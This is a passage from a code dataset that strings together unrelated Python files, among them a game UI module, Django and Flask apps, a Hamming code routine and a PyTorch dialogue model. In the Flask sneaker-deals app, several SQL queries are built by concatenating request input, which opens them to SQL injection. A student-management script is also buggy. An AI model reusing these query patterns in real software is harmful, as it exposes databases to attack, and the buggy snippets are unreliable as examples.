PrestigeProgressBlockUI(object):\n DEFAULT = 'PrestigeProgressBlockUI'\n CURRENT = 'CurrentPrestigeProgressBlockUI'\n VEHICLE_REWARD = 'VehicleRewardBlockUI'\n\n\n_AVAILABLE_LEVELS = sum(_ICON_NAME_TO_PRESTIGE_LEVEL.values(), [])\n\ndef getPrestigeProgressVO(allQuests, metaLevel, pPrestigeLevel, isMaxMetaLevel):\n maxPrestigeLevel = metaLevel.get('maxPrestigeRewardLevel', 0)\n prestigeAwards = _getPrestigeLevelUpAwards(allQuests, maxPrestigeLevel)\n epicMetaGameCtrl = dependency.instance(IEpicBattleMetaGameController)\n _, maxRewardClaimed = epicMetaGameCtrl.getSeasonData()\n blocksVO = []\n for index, prestigeAward in enumerate(prestigeAwards):\n isSpecialReward = prestigeAward is not None\n isVehicleReward = isSpecialReward and prestigeAward > 0\n isNextBlockFinalReward = index + 1 == maxPrestigeLevel\n isCurrentOrNextToCurrentBlock = index == pPrestigeLevel or pPrestigeLevel > 0 and index == pPrestigeLevel - 1\n icon = _getPrestigeBlockIconPath(index, pPrestigeLevel, isMaxMetaLevel, isSpecialReward)\n lineStyle = _getLineSeparatorLinkageForPrestigeLevel(index, pPrestigeLevel, isMaxMetaLevel) if not isNextBlockFinalReward else ''\n tankText = ''\n levelText = int2roman(index + 1)\n if isVehicleReward:\n itemsCache = dependency.instance(IItemsCache)\n vehicle = itemsCache.items.getItemByCD(prestigeAward)\n icon = _getTankIconPath(vehicle)\n tankText = _formatVehicleNameWithTypeIcon(vehicle)\n levelText = '' if not maxRewardClaimed else _rewardClaimedText()\n lineStyle = ''\n blocksVO.append({'prestigeLevel': index + 1,\n 'levelText': levelText,\n 'descText': tankText,\n 'canClaimVehicleReward': pPrestigeLevel == maxPrestigeLevel - 1 and isMaxMetaLevel and not maxRewardClaimed,\n 'blockStyle': _getBlockStyle(index, pPrestigeLevel, isVehicleReward),\n 'useShortSeparatorLine': isCurrentOrNextToCurrentBlock,\n 'lineSeparatorStyle': lineStyle,\n 'iconPath': icon})\n\n return {'titleHtmlText': text_styles.promoSubTitle(EPIC_BATTLE.PRESTIGEPROGRESS_HEADERTITLE),\n 'progressBlocks': blocksVO}\n\n\ndef getPrestigeLevelAwardsVOs(allQuests, pPrestigeLevel, iconSize):\n currentPrestigeQuest = allQuests.get(FRONTLINE_PRESTIGE_TOKEN_TEMPLATE % pPrestigeLevel, None)\n awardsVO = []\n if currentPrestigeQuest:\n bonuses = currentPrestigeQuest.getBonuses()\n awardsVO = sum([ bonus.getEpicAwardVOs(withDescription=False, iconSize=iconSize) for bonus in bonuses ], [])\n return awardsVO\n\n\ndef getLevelAwardsVOs(allQuests, level, iconSize):\n currentLevelQuest = allQuests.get(FRONTLINE_LEVEL_TOKEN_TEMPLATE % level, None)\n awardsVO = []\n if currentLevelQuest:\n bonuses = currentLevelQuest.getBonuses()\n awardsVO = sum([ bonus.getEpicAwardVOs(withDescription=False, iconSize=iconSize) for bonus in bonuses ], [])\n return awardsVO\n\n\ndef getFinalTankRewardVehicleID(allQuests, maxPrestigeLevel):\n prestigeAwards = _getPrestigeLevelUpAwards(allQuests, maxPrestigeLevel)\n vehID = 0\n for prestigeAward in prestigeAwards:\n isSpecialReward = prestigeAward != []\n isVehicleReward = isSpecialReward and prestigeAward > 0\n if isVehicleReward:\n vehID = prestigeAward\n\n return vehID\n\n\ndef getFinalTankRewardIconPath(allQuests, maxPrestigeLevel):\n prestigeAwards = _getPrestigeLevelUpAwards(allQuests, maxPrestigeLevel)\n resultingPath = ''\n for prestigeAward in prestigeAwards:\n isSpecialReward = prestigeAward != []\n isVehicleReward = isSpecialReward and prestigeAward > 0\n if isVehicleReward:\n itemsCache = dependency.instance(IItemsCache)\n vehicle = itemsCache.items.getItemByCD(prestigeAward)\n resultingPath = _getTankIconPath(vehicle)\n\n return resultingPath\n\n\ndef getBlockBackgroundIndexForPrestigeLevel(pLevel):\n return next((k for k, v in _ICON_NAME_TO_PRESTIGE_LEVEL.iteritems() if pLevel in v))\n\n\ndef _getPrestigeLevelUpAwards(allQuests, maxPrestigeLevel):\n awards = []\n for i in xrange(0, maxPrestigeLevel + 1):\n currentPrestigeQuest = allQuests.get(FRONTLINE_PRESTIGE_TOKEN_TEMPLATE % i, None)\n specialAwardValue = None\n if currentPrestigeQuest:\n bonuses = currentPrestigeQuest.getBonuses()\n for bonus in bonuses:\n bonusName = bonus.getName()\n if bonusName == PrestigeBonusType.VEHICLE:\n bonusVehicles = bonus.getVehicles()\n if bonusVehicles is not None:\n specialAwardValue = bonusVehicles[0][0].intCD\n if specialAwardValue is None and bonusName == PrestigeBonusType.BADGE:\n if bonus.getBadges() is not None:\n specialAwardValue = 0\n\n awards.append(specialAwardValue)\n\n return awards\n\n\ndef _getLineSeparatorLinkageForPrestigeLevel(currentBlock, prestigeLevel, canPrestige):\n if currentBlock < prestigeLevel:\n lineStyle = LineSeparatorUI.GREEN_LINE\n elif canPrestige and currentBlock == prestigeLevel:\n lineStyle = LineSeparatorUI.YELLOW_LINE\n else:\n lineStyle = LineSeparatorUI.GREY_LINE\n return lineStyle\n\n\ndef _getPrestigeBlockIconPath(currentBlock, currentPrestigeLevel, canPrestige, isSpecial):\n if canPrestige and currentBlock == currentPrestigeLevel + 1:\n path = PrestigeBlockIconState.SPECIAL if isSpecial else PrestigeBlockIconState.NORMAL\n postfix = PrestigeBlockIconPostfix.UNLOCKED\n elif canPrestige and currentBlock == currentPrestigeLevel:\n path = getBlockBackgroundIndexForPrestigeLevel(currentBlock)\n postfix = PrestigeBlockIconPostfix.PRESTIGE\n elif currentBlock == currentPrestigeLevel:\n path = getBlockBackgroundIndexForPrestigeLevel(currentBlock)\n postfix = PrestigeBlockIconPostfix.CURRENT\n elif currentBlock < currentPrestigeLevel:\n path = getBlockBackgroundIndexForPrestigeLevel(currentBlock)\n postfix = PrestigeBlockIconPostfix.REACHED\n else:\n path = PrestigeBlockIconState.SPECIAL if isSpecial else PrestigeBlockIconState.NORMAL\n postfix = PrestigeBlockIconPostfix.LOCKED\n return RES_ICONS.getEpicPrestigeBlockIcon(path, postfix)\n\n\ndef _getBlockStyle(currentBlock, currentPrestigeLevel, isVehicleReward):\n blockName = PrestigeProgressBlockUI.DEFAULT\n if isVehicleReward:\n blockName = PrestigeProgressBlockUI.VEHICLE_REWARD\n elif currentBlock == currentPrestigeLevel:\n blockName = PrestigeProgressBlockUI.CURRENT\n return blockName\n\n\ndef _getTankIconPath(vehicle):\n return RES_ICONS.getEpicBattlesIcon(vehicle.name.replace(':', '_'))\n\n\ndef _formatVehicleNameWithTypeIcon(vehicle):\n icon = icons.makeImageTag(Vehicle.getTypeSmallIconPath(vehicle.type, vehicle.isElite))\n level = int2roman(vehicle.level)\n return text_styles.statInfo('{} {}{}'.format(level, icon, vehicle.userName))\n\n\ndef _rewardClaimedText():\n text = i18n.makeString(EPIC_BATTLE.PRESTIGEPROGRESS_TANKREWARDRECEIVEDLABEL)\n icon = icons.makeImageTag(RES_ICONS.MAPS_ICONS_BUTTONS_CHECKMARK)\n rewardClaimedText = makeHtmlString('html_templates:battle/epicBattle', 'prestigeProgressRewardClaimed', {'msg': '{} {}'.format(icon, text)})\n return rewardClaimedText\n","sub_path":"source/res/scripts/client/gui/Scaleform/daapi/view/lobby/epicBattle/epic_prestige_progress.py","file_name":"epic_prestige_progress.py","file_ext":"py","file_size_in_byte":8658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"140956201","text":"#! python3\r\n#adds routes to MOBS based on inputs below\r\n\r\nfrom work.models import *\r\nfrom django.utils import timezone\r\nfrom datetime import timedelta\r\nimport csv\r\nimport calendar\r\n\r\nemployees = Employee.objects.exclude(end_date__lte=timezone.now())\r\nemployees = list(employees)\r\n\r\ndates = []\r\n\r\nfor i in range(2):\r\n dates.append(timezone.now().date() + timedelta(i))\r\n\r\nprint(\"You want to update the following dates: \"+str(dates))\r\n\r\n###Find employees working on each date###\r\n# for i in range(4):\r\n# query = Shift.objects.get_or_create(date=datetime.date(), driver=employees[i])\r\n\r\n###Populate jobs into each shift\r\ndate_shifts = Shift.objects.filter(date=dates[0])\r\njob_location_temp = Property.objects.get(pk=1)\r\n\r\nroute_list = Route.objects.all()\r\n# temp_route = Route.objects.get(pk=1)\r\n# print(temp_route.job_route.all()[0].route_location)\r\n\r\nfor d in dates:\r\n print(d)\r\n for route in route_list:\r\n if d.weekday()==int(route.weekday):\r\n shift, bool = Shift.objects.get_or_create(date=d,driver=route.driver)\r\n for prop in route.job_route.all():\r\n print(prop)\r\n shift.jobs_in_shift.get_or_create(job_location=prop.route_location,order=prop.order)\r\n # print(\"Created shift for %s %s\" % (d,j.driver))\r\n\r\n# for j in job_list:\r\n# print(j)\r\n# for l in j.job_route.all():\r\n# pass\r\n\r\n# for s in date_shifts:\r\n# print(s)\r\n#\r\n# job = s.jobs_in_shift.get_or_create(job_location=job_location_temp)\r\n# # job = s.jobs_in_shift.get_or_create(job_location=Property.objects.get(name='Pikesville Towne Center'))\r\n# print(job)\r\n# print(s.jobs_in_shift.all())\r\n\r\nprint('!! Run complete !!')\r\n","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"111145540","text":"from classifier import *\nfrom selector import *\nfrom utilities import *\n\nstorage_params = {\n 'training_file': \"./test/training_data/taipei/training.data\",\n 'validation_file': \"./test/training_data/taipei/testing.data\",\n 'testing_file': \"./test/training_data/taipei/testing.data\",\n 'output_dir': \"./output/\"\n}\nstorage = Storage(storage_params)\n\nclassifier_params = {\n 'epoch': [5, 300],\n 'word_ngrams': [1, 12],\n 'loss': [\"ns\", \"hs\", \"softmax\"],\n 'lr': [0.01, 0.99],\n 'lr_update_rate': [5, 500],\n 'dim': [100, 700],\n 'bucket': [5000, 20000]\n}\nfilter_params = {\n 'f1': [0.5, 1]\n}\nclassifier = NoUseClassifier(storage, classifier_params, filter_params)\nclassifier.init(5)\nclassifier.valid()\nvalid_file = classifier.predict_validation()\nselector = MaxEntropySelector(valid_file)\nprint(selector.select(5))\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"375324042","text":"from flask import Flask, render_template, request, flash, redirect, url_for, jsonify\nimport os \nimport sqlite3\nfrom datetime import datetime, date, time\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nfrom collections import OrderedDict\n\nscope = ['https://spreadsheets.google.com/feeds',\n'https://www.googleapis.com/auth/drive']\ncredentials = ServiceAccountCredentials.from_json_keyfile_name('apikey.json', scope)\ngc = gspread.authorize(credentials)\nsheet = gc.open(\"Sneaker Deals\").sheet1\n\n\napp = Flask(__name__, static_url_path='/static')\napp.config.from_object(__name__)\n\n@app.route('/updateLikes', methods=['GET', 'POST'])\ndef updateLikes():\n conn = sqlite3.connect(\"database.db\")\n cur = conn.cursor()\n ID = request.form['ID']\n print(cur.execute(\"SELECT likeCount FROM listTable WHERE listID=\"+ID+\";\").fetchone()[0])\n likeCount = int(cur.execute(\"SELECT likeCount FROM listTable WHERE listID=\"+ID+\";\").fetchone()[0]) + int(request.form['likes'])\n cur.execute(\"UPDATE listTable SET likeCount=\"+str(likeCount)+\";\")\n dislikeCount = int(cur.execute(\"SELECT dislikeCount FROM listTable WHERE listID=\"+ID+\";\").fetchone()[0]) + int(request.form['dislikes'])\n cur.execute(\"UPDATE listTable SET dislikeCount=\"+str(dislikeCount)+\";\")\n conn.commit()\n print(likeCount)\n return jsonify({'likeValue':likeCount,'dislikeValue':dislikeCount})\n\n@app.route('/expired', methods=['GET', 'POST'])\ndef expired():\n conn = sqlite3.connect(\"database.db\")\n cur = conn.cursor()\n increment = int(request.form['expiredCount'])\n ID = request.form['ID']\n expiredCount = int(cur.execute(\"SELECT expiredCount FROM listTable WHERE listID=\"+ID+\";\").fetchone()[0]) + increment\n cur.execute(\"UPDATE listTable SET expiredCount=\"+str(expiredCount)+\" WHERE listID=\" + ID + \";\")\n conn.commit()\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n conn = sqlite3.connect(\"database.db\")\n conn.row_factory = dict_factory\n cur = conn.cursor()\n listTable = [row for row in cur.execute(\"SELECT * FROM listTable ORDER BY posted DESC;\")]\n \n # tableList, tableMetaList = getTables()\n PAGES_PER_POST = 12\n someList = listTable\n page = request.args.get('page', 1, type=int)\n print(len(someList))\n if len(someList) > PAGES_PER_POST:\n if not page:\n list2Show = someList[:PAGES_PER_POST]\n NEXT_URL = 2\n PREV_URL = None\n elif page:\n if len(someList)>page*PAGES_PER_POST:\n list2Show = someList[(page-1)*PAGES_PER_POST:page*PAGES_PER_POST]\n PREV_URL = page - 1\n NEXT_URL = page + 1\n\n else:\n list2Show = someList[(page-1)*PAGES_PER_POST:]\n NEXT_URL = None\n PREV_URL = page - 1\n else:\n NEXT_URL = None\n PREV_URL = None\n list2Show = someList\n if PREV_URL == 0:\n PREV_URL = None\n return render_template('index.html', tableMetaList = list2Show , NEXT_URL = NEXT_URL, PREV_URL = PREV_URL)\n\n\n@app.route('/subscribe', methods=['GET', 'POST'])\ndef subscribe():\n print(request.form)\n subSheet = gc.open(\"Sneaker Deals\").worksheet('Email Subscriptions')\n subSheet.append_row([request.form['name'], request.form['email']], value_input_option='RAW')\n return redirect(url_for('index'))\n\n@app.route('/post', methods=['GET', 'POST'])\ndef postTable():\n return render_template('sneakertable.html')\n\n@app.route('/list/', methods=['GET', 'POST'])\ndef showList(id):\n conn = sqlite3.connect(\"database.db\")\n conn.row_factory = dict_factory\n cur = conn.cursor()\n listTable = [row for row in cur.execute(\"SELECT * FROM listTable WHERE listID=\"+id+\";\")][0]\n sneakerTable = [row for row in cur.execute(\"SELECT * FROM sneakerTable WHERE listID=\"+id+\";\")]\n return render_template('listTable.html', shoeList = sneakerTable, tableMeta = listTable)\n@app.route('/feedback', methods=['GET', 'POST'])\ndef feedback():\n subSheet = gc.open(\"Sneaker Deals\").worksheet('Feedback')\n subSheet.append_row([request.form['name'], request.form['email'], request.form['message']], value_input_option='RAW')\n return redirect(url_for('index'))\n\n# def getTables():\n# fullList = sheet.get_all_records()\n# tableList = []\n# tableCount = max([x['ID'] for x in fullList])\n# j=1\n# i=0\n# while(j<=tableCount):\n# saleList = []\n# while(fullList[i]['ID']==j):\n# saleList.append(fullList[i])\n# i+=1\n# if i >= len(fullList):\n# break\n# tableList.append(saleList)\n# j+=1\n# tableMetaList = []\n# for alist in tableList:\n# tableMetaList.append({'ID':alist[0]['ID'],'Name':alist[0]['NAME'],'Length':len(alist), 'Posted':alist[0]['POSTED'],'Tags':alist[0]['TAGS'].split(\",\"),'ExpiredCount':int(alist[0]['EXPIRED COUNT']),'likeCount':int(alist[0]['LIKE COUNT']),'dislikeCount':int(alist[0]['DISLIKE COUNT'])})\n\n# return (tableList, tableMetaList)\n\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n\nif __name__ == '__main__':\n app.run(debug=False)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"172850267","text":"students = []\nwhile True:\n print (\" Press 1 to add student\")\n print (\" press 2 to search student\")\n print (\" press 3 to delete students\")\n print (\"press 4 to check number of students enrolled\")\n print ( \" press 5 to exit\")\n choice =input(\" Enter your choice : \")\n if choice == 1:\n student = {}\n student [ \"Name\"] = input (\" please enter student name:\") \n student [ \"Father name\"] = input (\" please Enter father name;\") \n student [ \"Cell number\"] = input (\" please Enter cell number:\") \n students.append(students)\n elif choice == 2:\n name = input(\" Enter the name you want to search for:\")\n for student in students:\n if student[\"Name\"].lower() == name.lower() :\n print(\"Student with name \" + name + \"found and details are avaliable\")\n print (student)\n elif choice == 3: \n del student[ \" Father name\"]\n print (student) \n elif choice == 4:\n print (\" we curently have \" + str(len(students)) + 'Students')\n elif choice == 5:\n break\n\n\n","sub_path":"studentmanage.py","file_name":"studentmanage.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"330483780","text":"\"\"\"Nice logging, with colors on Linux.\"\"\"\n\nfrom typing import Any, Union\nimport logging\nimport sys\n\nclass ColoredFormatter(logging.Formatter):\n \"\"\"Logging Formatter to add colors\"\"\"\n\n fg_bright_blue = \"\\x1b[94m\"\n fg_yellow = \"\\x1b[33m\"\n fg_red = \"\\x1b[31m\"\n fg_bright_red_bold = \"\\x1b[91;1m\"\n reset = \"\\x1b[0m\"\n\n def __init__(self, fmt, datefmt):\n super().__init__()\n self.messagefmt = fmt\n self.datefmt = datefmt\n\n self.formats = {\n logging.DEBUG: \"{}{}{}\".format(self.fg_bright_blue, self.messagefmt, self.reset),\n logging.INFO: \"{}\".format(self.messagefmt),\n logging.WARNING: \"{}{}{}\".format(self.fg_yellow, self.messagefmt, self.reset),\n logging.ERROR: \"{}{}{}\".format(self.fg_red, self.messagefmt, self.reset),\n logging.CRITICAL: \"{}{}{}\".format(self.fg_bright_red_bold, self.messagefmt, self.reset)\n }\n\n self.formatters = {\n logging.DEBUG: logging.Formatter(self.formats[logging.DEBUG], datefmt = self.datefmt),\n logging.INFO: logging.Formatter(self.formats[logging.INFO], datefmt = self.datefmt),\n logging.WARNING: logging.Formatter(self.formats[logging.WARNING], datefmt = self.datefmt),\n logging.ERROR: logging.Formatter(self.formats[logging.ERROR], datefmt = self.datefmt),\n logging.CRITICAL: logging.Formatter(self.formats[logging.CRITICAL], datefmt = self.datefmt)\n }\n\n def format(self, record):\n formatter = self.formatters[record.levelno]\n return formatter.format(record)\n\ndef setup_root_logger(\n no_color: bool = False,\n verbosity_level: int = 0,\n quietness_level: int = 0,\n messagefmt: str = \"[%(asctime)s][%(levelname)s] %(message)s (%(filename)s:%(lineno)d)\",\n messagefmt_verbose: str = \"[%(asctime)s][%(levelname)s] %(message)s (%(filename)s:%(lineno)d)\",\n datefmt: str = \"%Y-%m-%d %H:%M:%S\"\n ):\n messagefmt_to_use = messagefmt_verbose if verbosity_level else messagefmt\n logging_level = 10 * (2 + quietness_level - verbosity_level)\n if not no_color and sys.platform == \"linux\":\n formatter_class = ColoredFormatter\n else:\n formatter_class = logging.Formatter\n\n root_logger = logging.getLogger()\n root_logger.setLevel(logging_level)\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(formatter_class(fmt = messagefmt_to_use, datefmt = datefmt))\n root_logger.addHandler(console_handler)\n\ndef logging_fatal(message, log_stack_info: bool = True, exit_code: int = 1):\n logging.critical(message, stack_info = log_stack_info)\n logging.critical(\"Exiting\")\n raise SystemExit(exit_code)\n\ndef log_tree(title, tree, finals = None, log_leaves_types = True, logging_level = logging.INFO):\n \"\"\"Log tree nicely if it is a dictionary.\n log_leaves_types can be False to log no leaves, True to log all leaves, or a tuple of types for which to log.\"\"\"\n if finals is None:\n finals = []\n if not isinstance(tree, dict):\n logging.log(msg = \"{}{}{}\".format(\n \"\".join([\" \" if final else \"│\" for final in finals[:-1]] + [\"└\" if final else \"├\" for final in finals[-1:]]),\n title,\n \": {}\".format(tree) if log_leaves_types is not False and (log_leaves_types is True or isinstance(tree, log_leaves_types)) else \"\"\n ), level = logging_level)\n else:\n logging.log(msg = \"{}{}\".format(\n \"\".join([\" \" if final else \"│\" for final in finals[:-1]] + [\"└\" if final else \"├\" for final in finals[-1:]]),\n title\n ), level = logging_level)\n tree_items = list(tree.items())\n for key, value in tree_items[:-1]:\n log_tree(key, value, finals = finals + [False], log_leaves_types = log_leaves_types, logging_level = logging_level)\n for key, value in tree_items[-1:]:\n log_tree(key, value, finals = finals + [True], log_leaves_types = log_leaves_types, logging_level = logging_level)\n\n# like logging.CRITICAl, logging.DEBUG etc\nFATAL = 60\n\ndef perror(s: Union[str, Any], e: OSError, logging_level: int = logging.ERROR):\n msg = f\"{s}{': ' if s else ''}{e.strerror}\"\n if logging_level == FATAL:\n logging_fatal(msg)\n else:\n logging.log(logging_level, msg)\n","sub_path":"android/adbsync/SAOLogging.py","file_name":"SAOLogging.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"400475609","text":"import random\n\ndef hamming_encode(data: str) -> str:\n data_tmp = '00' + data[0] + '0' + data[1:4] + '0' + data[4:]\n parity = 0\n for i in range(len(data_tmp)):\n if data_tmp[i] == '1':\n parity ^= i + 1\n parity = (bin(parity)[2:].rjust(4, '0'))[::-1]\n data_tmp = parity[:2] + data[0] + parity[2] + data[1:4] + parity[3] + data[4:]\n return data_tmp + ('0' if parity_check(data_tmp) else '1')\n\ndef error_occur(data: str, num: int) -> str:\n error_list = random.sample(range(0, len(data)), num)\n error_data = data[:]\n for tmp in error_list:\n error_data = error_data[:tmp] + ('0' if error_data[tmp] == '1' else '1') + error_data[tmp + 1:]\n return error_data\n\ndef parity_check(data):\n count = 0\n for c in data:\n if c == '1':\n count += 1\n return count % 2 == 0\n\ndef hamming_decode(data: str, error = 0) -> str:\n if error > 0:\n data = error_occur(data, error)\n diff = 0\n for i in range(15):\n if data[i] == '1':\n diff ^= i + 1\n if diff == 0:\n return data[2] + data[4:7] + data[8:15]\n diff -= 1\n data = data[:diff] + ('0' if data[diff] == '1' else '1') + data[diff + 1:]\n re_encode = hamming_encode(data[2] + data[4:7] + data[8:15])\n if re_encode[15] == data[15]:\n return data[2] + data[4:7] + data[8:15]\n else:\n return False\n\nif __name__ == \"__main__\":\n file_lines = []\n f = open('lab2_data/hamming_15_11.txt')\n file_lines = f.readlines()\n f.close()\n print (len(file_lines))\n for line in file_lines:\n data = line.split(',')\n data[0], data[1] = data[0].strip(), data[1].strip()\n assert (hamming_decode(hamming_encode(data[0]) ) == data[0])\n assert (hamming_decode(hamming_encode(data[0]), 1) == data[0])\n assert (hamming_decode(hamming_encode(data[0]), 2) == False)\n # print (hamming_encode(data[0]))\n # assert (hamming_encode(data[0]) == data[1])\n # print (hamming_encode(data[0]))\n # print (hamming_decode(hamming_encode(data[0]), 1))\n # print (data[0])\n ","sub_path":"hamming_16_11_method2.py","file_name":"hamming_16_11_method2.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"538333639","text":"word_for = {\n 0 : \"\", \n 1 : \"one\", 2 : \"two\", 3 : \"three\",\n 4 : \"four\", 5 : \"five\", 6 : \"six\",\n 7 : \"seven\", 8 : \"eight\", 9 : \"nine\",\n 10 : \"ten\", 11 : \"eleven\", 12 : \"twelve\",\n 13 : \"thirteen\", 14 : \"fourteen\", 15 : \"fifteen\",\n 16 : \"sixteen\", 17 : \"seventeen\", 18 : \"eighteen\",\n 19 : \"nineteen\", 20 : \"twenty\", 30 : \"thirty\",\n 40 : \"forty\", 50 : \"fifty\", 60 : \"sixty\",\n 70 : \"seventy\", 80 : \"eighty\", 90 : \"ninety\" \n}\n\ndef two_digit_name(n):\n low = n % 10\n high = n - low\n return word_for[high] + word_for[low]\n\ndef three_digit_name(n):\n high = n // 100\n low = n % 100\n if low == 0:\n return word_for[high] + \"hundred\"\n else:\n return word_for[high] + \"hundredand\" + name_of(low)\n \ndef name_of(n):\n if n < 20:\n return word_for[n]\n elif n < 100:\n return two_digit_name(n)\n elif n < 1000:\n return three_digit_name(n)\n elif n == 1000:\n return \"onethousand\"\n else:\n none\n\ndef solution():\n names = map(name_of, range(1,1001))\n return sum(map(len, names))\n\nif __name__ == \"__main__\":\n print(solution())\n","sub_path":"src/p17.py","file_name":"p17.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"615136346","text":"from ftw.upgrade import UpgradeStep\nfrom opengever.inbox.forwarding import IForwarding\n\n\nFORWARDING_TASK_TYPE_ID = u'forwarding_task_type'\n\n\nclass SetTaskTypeForForwardingOnObjects(UpgradeStep):\n \"\"\"Set task_type for forwarding on objects.\n \"\"\"\n\n deferrable = True\n\n def __call__(self):\n query = {'object_provides': IForwarding.__identifier__}\n for obj in self.objects(query, 'Set task_type on forwarding objects'):\n # attributestorage, bypass field fallback to default\n task_type = obj.__dict__.get('task_type', None)\n if not task_type:\n obj.task_type = FORWARDING_TASK_TYPE_ID\n","sub_path":"opengever/core/upgrades/20200901163834_set_task_type_for_forwarding_on_objects/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"316219280","text":"import torch.nn as nn, torch, numpy as np, copy, pdb\nfrom torch.autograd import Variable\nuse_cuda = torch.cuda.is_available()\n\n\ndef max_out(x):\n # make sure s2 is even and that the input is 2 dimension\n if len(x.size()) == 2:\n s1, s2 = x.size()\n x = x.unsqueeze(1)\n x = x.view(s1, s2 // 2, 2)\n x, _ = torch.max(x, 2)\n\n elif len(x.size()) == 3:\n s1, s2, s3 = x.size()\n x = x.unsqueeze(1)\n x = x.view(s1, s2, s3 // 2, 2)\n x, _ = torch.max(x, 3)\n\n return x\n\n\n# encode each sentence utterance into a single vector\nclass BaseEncoder(nn.Module):\n def __init__(self, vocab_size, emb_size, hid_size, num_lyr, bidi):\n super(BaseEncoder, self).__init__()\n self.hid_size = hid_size\n self.num_lyr = num_lyr\n self.drop = nn.Dropout(0.3)\n self.direction = 2 if bidi else 1\n # by default they requires grad is true\n self.embed = nn.Embedding(vocab_size, emb_size, padding_idx=10003, sparse=False)\n self.rnn = nn.GRU(input_size=emb_size, hidden_size=hid_size,\n num_layers=num_lyr, bidirectional=bidi, batch_first=True)\n\n def forward(self, x, x_lens):\n bt_siz, seq_len = x.size(0), x.size(1)\n h_0 = Variable(torch.zeros(self.direction * self.num_lyr, bt_siz, self.hid_size), requires_grad=False)\n if use_cuda:\n x = x.cuda()\n h_0 = h_0.cuda()\n x_emb = self.embed(x)\n x_emb = self.drop(x_emb)\n x_emb = torch.nn.utils.rnn.pack_padded_sequence(x_emb, x_lens, batch_first=True)\n x_o, x_hid = self.rnn(x_emb, h_0)\n\n # move the batch to the front of the tensor\n x_hid = x_hid.view(x.size(0), -1, self.hid_size)\n\n \"\"\"\n base_ind = np.array([ti*seq_len for ti in range(bt_siz)])\n x_o, _ = torch.nn.utils.rnn.pad_packed_sequence(x_o, batch_first=True)\n x_o = x_o.contiguous().view(-1, self.hid_size)\n x_o = x_o[base_ind + x_lens - 1, :]\n x_o = x_o.unsqueeze(1)\n print((x_o == x_hid).all()) --> true\n \"\"\"\n\n return x_hid\n\n\n# encode the hidden states of a number of utterances\nclass SessionEncoder(nn.Module):\n def __init__(self, hid_size, inp_size, num_lyr, bidi):\n super(SessionEncoder, self).__init__()\n self.hid_size = hid_size\n self.num_lyr = num_lyr\n self.direction = 2 if bidi else 1\n self.rnn = nn.GRU(hidden_size=hid_size, input_size=inp_size,\n num_layers=num_lyr, bidirectional=bidi, batch_first=True)\n\n def forward(self, x):\n h_0 = Variable(torch.zeros(self.direction * self.num_lyr, x.size(0), self.hid_size), requires_grad=False)\n if use_cuda:\n h_0 = h_0.cuda()\n # output, h_n for output batch is already dim 0\n h_o, h_n = self.rnn(x, h_0)\n # move the batch to the front of the tensor\n # return h_o if you want to decode intermediate queries as well\n h_n = h_n.view(x.size(0), -1, self.hid_size)\n return h_o\n\n\n# decode the hidden state\nclass Decoder(nn.Module):\n def __init__(self, vocab_size, emb_size, ses_hid_size, hid_size, num_lyr=1, bidi=False, teacher=True):\n super(Decoder, self).__init__()\n self.emb_size = emb_size\n self.hid_size = hid_size\n self.num_lyr = num_lyr\n self.drop = nn.Dropout(0.3)\n self.tanh = nn.Tanh()\n self.in_embed = nn.Embedding(vocab_size, emb_size, padding_idx=10003, sparse=False)\n self.rnn = nn.GRU(hidden_size=2*hid_size, input_size=emb_size,\n num_layers=num_lyr, bidirectional=False, batch_first=True)\n\n self.lin1 = nn.Linear(ses_hid_size, hid_size)\n self.lin2 = nn.Linear(2*hid_size, 2*emb_size)\n self.lin3 = nn.Embedding(vocab_size, 2*emb_size, padding_idx=10003, sparse=False)\n self.out_embed = nn.Linear(emb_size, vocab_size, False)\n self.log_soft2 = nn.LogSoftmax(dim=2)\n self.direction = 2 if bidi else 1\n self.teacher_forcing = teacher\n\n def do_decode(self, siz, seq_len, ses_encoding, target=None):\n preds = []\n tok = Variable(torch.ones(siz, 1).long(), requires_grad=False)\n hid_n = ses_encoding\n if use_cuda:\n tok = tok.cuda()\n if target is not None:\n target = target.cuda()\n\n for i in range(seq_len):\n if target is not None:\n tok = target.select(1, i)\n tok = tok.unsqueeze(1)\n\n tok_vec = self.in_embed(tok)\n tok_vec = self.drop(tok_vec)\n hid_o, hid_n = self.rnn(tok_vec, torch.cat((hid_n, ses_encoding), 2))\n hid_n = hid_n[:, :, :self.hid_size]\n hid_o = self.lin2(hid_o) + self.lin3(tok)\n hid_o = max_out(hid_o)\n hid_o = self.out_embed(hid_o)\n preds.append(hid_o)\n\n op = self.log_soft2(hid_o)\n _, max_ind = torch.max(op, dim=2)\n tok = max_ind.clone()\n\n dec_o = torch.cat(preds, 1)\n return dec_o\n\n def forward(self, ses_encoding, x=None, x_lens=None, beam=5):\n ses_encoding = self.tanh(self.lin1(ses_encoding))\n # indicator that we are doing inference\n if x is None:\n n_candidates = []\n candidates = [([1], 0)]\n gen_len = 1\n while 